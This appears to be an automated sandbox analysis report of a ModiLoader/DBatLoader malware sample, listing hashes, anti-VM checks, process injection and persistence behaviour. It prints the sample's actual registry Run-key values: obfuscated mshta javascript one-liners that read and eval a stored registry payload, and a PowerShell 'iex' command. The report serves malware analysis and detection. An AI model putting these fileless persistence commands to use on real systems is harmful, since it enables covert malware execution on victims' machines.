Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
07-05-2024 05:27
Static task
static1
Behavioral task
behavioral1
Sample
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
Resource
win10v2004-20240419-en
General
-
Target
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
-
Size
356KB
-
MD5
1f98f4990bbf6b268365ba7fdf56405f
-
SHA1
e1f5a46baf14c6fdd67fcb1b3d37b54ad9a52317
-
SHA256
5f2ebf4e711218b1c47e8c83cbe354a369efcfed3835c480c7ae08001dfbdb8f
-
SHA512
bbf91e6a1a1c2a50f630d4ec347c7678647a78ce976af3db92b62498f77af84f506e1dadd4d9d8757c9f2297e80bbaf96e8575f5cb331800465417a6ed08717f
-
SSDEEP
6144:Sae/c0RVIqxFu4s2a9XHCd9hxJamsAT4k+wCGbfQfojzMBR5h:W/cMVDxFu43cHYf1TPCAxjzMj
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2540 2052 mshta.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
Processes:
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 64 IoCs
Processes:
resource yara_rule behavioral1/memory/2340-0-0x0000000000220000-0x0000000000267000-memory.dmp modiloader_stage2 behavioral1/memory/2340-1-0x0000000000220000-0x0000000000267000-memory.dmp modiloader_stage2 behavioral1/memory/2340-3-0x0000000000400000-0x000000000043E000-memory.dmp modiloader_stage2 behavioral1/memory/2340-13-0x0000000001EA0000-0x0000000001F74000-memory.dmp modiloader_stage2 behavioral1/memory/2340-17-0x0000000001EA0000-0x0000000001F74000-memory.dmp modiloader_stage2 behavioral1/memory/2340-18-0x0000000001EA0000-0x0000000001F74000-memory.dmp modiloader_stage2 behavioral1/memory/2340-16-0x0000000001EA0000-0x0000000001F74000-memory.dmp modiloader_stage2 behavioral1/memory/2340-19-0x0000000001EA0000-0x0000000001F74000-memory.dmp modiloader_stage2 behavioral1/memory/2340-15-0x0000000001EA0000-0x0000000001F74000-memory.dmp modiloader_stage2 behavioral1/memory/2340-14-0x0000000001EA0000-0x0000000001F74000-memory.dmp modiloader_stage2 behavioral1/memory/2340-20-0x0000000001EA0000-0x0000000001F74000-memory.dmp modiloader_stage2 behavioral1/memory/2308-25-0x00000000002E0000-0x0000000000327000-memory.dmp modiloader_stage2 behavioral1/memory/2308-24-0x00000000002E0000-0x0000000000327000-memory.dmp modiloader_stage2 behavioral1/memory/2340-26-0x0000000000400000-0x000000000043E000-memory.dmp modiloader_stage2 behavioral1/memory/2340-27-0x0000000001EA0000-0x0000000001F74000-memory.dmp modiloader_stage2 behavioral1/memory/2812-31-0x00000000061E0000-0x00000000062B4000-memory.dmp modiloader_stage2 behavioral1/memory/2140-32-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-34-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2812-35-0x00000000061E0000-0x00000000062B4000-memory.dmp modiloader_stage2 behavioral1/memory/2140-40-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-43-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-44-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-41-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-38-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-50-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-51-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-39-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-75-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-66-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-74-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-65-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-64-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-63-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-55-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-53-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-52-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-46-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-58-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-42-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-57-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-56-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-54-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-49-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-48-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-37-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-47-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-36-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-45-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2140-67-0x0000000000240000-0x000000000037E000-memory.dmp modiloader_stage2 behavioral1/memory/2876-82-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-98-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-99-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-96-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-94-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-93-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-91-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-90-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-88-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-87-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-85-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-97-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-84-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-95-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 behavioral1/memory/2876-92-0x00000000002A0000-0x00000000003DE000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 3 IoCs
Processes:
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exeregsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMWare, Inc.\VMWare Tools 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMWare, Inc.\VMWare Tools 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
Processes:
regsvr32.exepid process 2140 regsvr32.exe -
Drops startup file 1 IoCs
Processes:
regsvr32.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk regsvr32.exe -
Executes dropped EXE 1 IoCs
Processes:
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exepid process 2308 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe -
Loads dropped DLL 2 IoCs
Processes:
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exepid process 2340 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 2340 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:BD9HFvlyJ1=\"uR7kzy\";Lp3=new%20ActiveXObject(\"WScript.Shell\");ttp4sMhEJ=\"a5d\";Ko5k6u=Lp3.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\hsgrudze\\\\zdxvakv\");wDW5uLPk=\"aVWk\";eval(Ko5k6u);VZMTwY1wp=\"Rz\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:QUsnyCm4=\"6ycAtR\";nP8=new%20ActiveXObject(\"WScript.Shell\");y8eqNivYR=\"q6w\";CqF37O=nP8.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");f6KCIIYb=\"5IubddsEY\";eval(CqF37O);zG6PSey=\"IIHLonuFAG\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\416844\\eecdc5.lnk\"" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exeregsvr32.exedescription pid process target process PID 2812 set thread context of 2140 2812 powershell.exe regsvr32.exe PID 2140 set thread context of 2876 2140 regsvr32.exe regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe -
Modifies registry class 7 IoCs
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open\command\ = "mshta \"javascript:i7KylNfXv=\"LZZHoS18\";W9t=new ActiveXObject(\"WScript.Shell\");vMC7MiqH5v=\"I\";EZz0z2=W9t.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");X4Hilzcyd=\"l\";eval(EZz0z2);ba9mfL3fQW=\"n6zJegkNXW\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.983f33d regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.983f33d\ = "81b494" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exepowershell.exe1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exeregsvr32.exepid process 2340 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 2340 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 2812 powershell.exe 2308 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 2308 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe 2140 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exeregsvr32.exepid process 2812 powershell.exe 2140 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2812 powershell.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exepid process 2340 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 2308 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exemshta.exepowershell.exeregsvr32.exedescription pid process target process PID 2340 wrote to memory of 2308 2340 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe PID 2340 wrote to memory of 2308 2340 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe PID 2340 wrote to memory of 2308 2340 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe PID 2340 wrote to memory of 2308 2340 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe PID 2540 wrote to memory of 2812 2540 mshta.exe powershell.exe PID 2540 wrote to memory of 2812 2540 mshta.exe powershell.exe PID 2540 wrote to memory of 2812 2540 mshta.exe powershell.exe PID 2540 wrote to memory of 2812 2540 mshta.exe powershell.exe PID 2812 wrote to memory of 2140 2812 powershell.exe regsvr32.exe PID 2812 wrote to memory of 2140 2812 powershell.exe regsvr32.exe PID 2812 wrote to memory of 2140 2812 powershell.exe regsvr32.exe PID 2812 wrote to memory of 2140 2812 powershell.exe regsvr32.exe PID 2812 wrote to memory of 2140 2812 powershell.exe regsvr32.exe PID 2812 wrote to memory of 2140 2812 powershell.exe regsvr32.exe PID 2812 wrote to memory of 2140 2812 powershell.exe regsvr32.exe PID 2812 wrote to memory of 2140 2812 powershell.exe regsvr32.exe PID 2140 wrote to memory of 2876 2140 regsvr32.exe regsvr32.exe PID 2140 wrote to memory of 2876 2140 regsvr32.exe regsvr32.exe PID 2140 wrote to memory of 2876 2140 regsvr32.exe regsvr32.exe PID 2140 wrote to memory of 2876 2140 regsvr32.exe regsvr32.exe PID 2140 wrote to memory of 2876 2140 regsvr32.exe regsvr32.exe PID 2140 wrote to memory of 2876 2140 regsvr32.exe regsvr32.exe PID 2140 wrote to memory of 2876 2140 regsvr32.exe regsvr32.exe PID 2140 wrote to memory of 2876 2140 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VMWare Tools registry key
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VMWare Tools registry key
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of UnmapMainImage
PID:2308
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:wh5VXfF0="RGcF6bBbn8";J3G3=new%20ActiveXObject("WScript.Shell");SsG4Jhybu="zl6rcltazH";Lcu0I=J3G3.RegRead("HKLM\\software\\Wow6432Node\\QpgStiGQ4\\NzOMWkbXt");Lqt0swCDV="XirWa1";eval(Lcu0I);cRNm3TX="ny";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:amuexm2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵PID:2876
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD51e74f54983f584fb375997f6d710fcc5
SHA1e29d7ef56bd7b0d365e4154e7fa13a56dbdb8d9f
SHA256163a3152a25643419866d8d77145766341a0c8aab5f041f28b8d30b87610b1be
SHA51279434d6e22b91427bf4846efcd6a88a1752a28c577dd65b28ba761d82fdba6567ce42458bba5563ccb8041e766e35a4021e5200a6647ddc9d38f4102e8978164
-
Filesize
61B
MD5a9d3ea542d72c3d4eb6e79b37f9b265e
SHA19ef048c6a4cc72891fe4b6d8c3ae59e134711cb9
SHA256d287a2bcc9c2485a60329a6bb94fb260bec57524e3098a5bd7c7cedf3e460314
SHA512eba879b158972749be9a48b1ff0d7393f69960da48c1f8e92c3886d9cf16ae437ac5eea449f59de788cbf5b9033ebc78311f2b591f6d41631521a3f0ea24208b
-
Filesize
881B
MD5fda8ceca25b52950b08c0f043937cecb
SHA15cf5d7016ab5b938ded88c6ca5e2a23fe34f6820
SHA2569eab49ea41f5fe232064099743a5d1b73c172f14eb2941b1d740f55b547c7822
SHA512df7b8749d776077a24a6d9b5517b071b6497bc0232027bec799efe2ea6428203a299dd8cdd56f34498400423633f82ad73d5c4431b6777aa04dc5ab2e8fa1653
-
Filesize
2KB
MD514d6113f0996400fbfc9e43e66608164
SHA11e9f4c8b164b04254a56374506c6615f78ef879b
SHA256dbfdb41e2c34703b6d471705ecd3a00d9b21b3e4777babf0b0077e6f26885099
SHA512a507ee36325ac7ba7021230f1536dd8f5569f1da3f8549d5c245e862fb45fd800946a7b0793ed48bed0b082a1db8e058b074bc020273879d8982b09a28bd3da6
-
Filesize
991B
MD5d5bcec5b230d761d784e7aac99b76091
SHA1a8f306eb2135a2a7ea3b52a86f0f4a0d6ac74d00
SHA25641de7af6eb3efa1d53733bf5717bc833ab6033d0e49ec207c7a67531bbb28053
SHA512ac8463090bd2dea9627bd12ff335c5380a4e247a0bd70fb71fcad4cf0c001f14cf97aebd405d017fe3e4d5e41f0ca4ce8a8345f35842241375e0a5f83b55ca39
-
\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
Filesize356KB
MD51f98f4990bbf6b268365ba7fdf56405f
SHA1e1f5a46baf14c6fdd67fcb1b3d37b54ad9a52317
SHA2565f2ebf4e711218b1c47e8c83cbe354a369efcfed3835c480c7ae08001dfbdb8f
SHA512bbf91e6a1a1c2a50f630d4ec347c7678647a78ce976af3db92b62498f77af84f506e1dadd4d9d8757c9f2297e80bbaf96e8575f5cb331800465417a6ed08717f